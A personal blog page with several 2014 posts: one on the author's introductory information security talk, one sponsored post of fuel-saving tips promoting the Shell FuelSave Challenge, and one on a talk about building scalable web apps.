Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review


An Introduction To Information Security – OpenCoffeeClubKL #31

So I gave a talk about infosec stuff in July at OpenCoffeeClub KL, as it’s what I used to do for a living – people were always asking me to share a little more about it.

The timing is a little odd again, as it happens. In 2011 I did 2 talks in the same month, 1 on WordPress (High Performance WordPress – Scaling, Tuning, Optimizing & More) & one which was more random (The History Of The Future at WebCamp KL).

In 2012 I ended up doing 2 presentations in the same week (actually on 2 consecutive days), and once again the first was technical and the second a bit more random.

The first one was about MongoDB and was for the KL Mongo User Group AKA KL MUG – High Availability MongoDB & Replica Sets – A How To & Kinda Tutorial.

The second was to a bunch of copywriters about blogging – Blogging WTF? At The Last Word KL – A Meeting For Copywriters.

I guess I skipped on 2013, and here I am in 2014 – giving 2 talks almost in the same month again, the first being this one actually and the second was Building Scalable Web Apps – LVL.UP KL – July 2014.

My talk was about 15 minutes and titled “Introduction to Information Security” – which covers some basics on what Information Security is, how it can impact your business and some tips on how to mitigate against risk.


Here are the slides:

And the video (the front got cut off slightly – but nothing important, only when I was talking about myself):

So yah, an introduction to infosec – if you do have any further questions drop them in the comments below!

You can see all my talks given here.


My 6 Tips For Fuel Efficiency & Shell FuelSave Challenge 2014

Fuel economy is super important and is one of the reasons I recently changed to a new car, as old cars tend to get less and less efficient as they age.


There are various things you can do to increase your fuel economy, which fall into 4 main categories:

  • Drive more efficiently (Drive smoothly, remove roof racks when not in use, change to higher gears faster etc)
  • Keep your car well maintained (Use the correct oil and follow the service schedule, inflate your tyres appropriately etc)
  • Plan and combine trips (Try and avoid traffic jams, combine trips where you can, don’t idle too much)
  • Choose a more efficient vehicle (Choose a Diesel car, or a hybrid or one of the newer more efficient models)

Shell is super passionate about helping Malaysian motorists to be more fuel efficient by making smart choices on the road and also with Shell FuelSave 95, which has Active Efficiency Ingredients designed to improve fuel and engine efficiency.

This year, if you take part in the Shell FuelSave Challenge 2014 you will be able to enhance your knowledge on making smart choices on the road through a new experience beyond the driving challenge by being part of an exciting online Shell FuelSave Journey with the opportunity to win exclusive prizes and rewards.

Which brings us to the 6th annual Shell FuelSave Challenge, which showcases how easy it is for you to save fuel and become advocates for fuel efficiency coupled with using Shell FuelSave 95 which is optimized for greater fuel efficiency. It will be a great platform to learn more about fuel efficiency and educate yourself a little on things you can do, and choices you can make to increase your fuel economy.


To be a part of this year’s Shell FuelSave Challenge, you must be aged between 21 years and 60 years, with a minimum of two (2) years of driving experience. If you fulfil these criteria you can make your way to the Shell FuelSave Roadshows which will be held in four cities across the nation (Johor Bahru, Kuantan, Penang & KL) to answer a few simple questions and go through a short listing process.

Alternatively, you can register online for the Shell FuelSave Challenge and take part in the Shell FuelSave Journey here www.shell.com.my/fschallenge.

The grand prize is well worth a look as the four winners from each city will compete for RM20,000! And well, even if you don’t win anything, you’ll learn a lot more about making smart choices whilst driving with Shell FuelSave Tips and about Shell FuelSave 95.

Do you have any tips to share for saving fuel? Here are some of my personal tips:

  1. Don’t accelerate aggressively
  2. In traffic keep a good distance and look a few cars ahead to see what’s happening, this avoids excessive braking/acceleration
  3. If you have a turbo car, get a boost gauge and keep the vacuum pressure low (below 0.5bar) to save fuel
  4. Check your tyre pressures regularly and keep them inflated properly
  5. Use cruise control if you have it on the highway (this keeps your speed constant and improves fuel efficiency a lot)
  6. Don’t drive too fast

Remember to sign up here – www.shell.com.my/fschallenge.


Building Scalable Web Apps – LVL.UP KL – July 2014

So the most recent LVL.UP KL meeting was about Internet Architecture (my speciality! yay) – and we had an amazing line-up of speakers – plus me.


It wasn’t my most coherent talk, due to my wife just giving birth (7 weeks early..) – so I was pretty tired and did the slides at 5am – not that that should be an excuse haha. My talk was about Building Scalable Web Apps, which covered a basic intro to scalability, 5 things to consider/think about and 5 things you can do to build at scale.

Anyway here are the slides:

I’m just sad my animated GIFs didn’t work in the live preso or on Slideshare – bah!

And the video of the talk:

If you have any comments/suggestions/feedback please do drop them in the comments below.

Enjoy!

You can see all my talks given here.
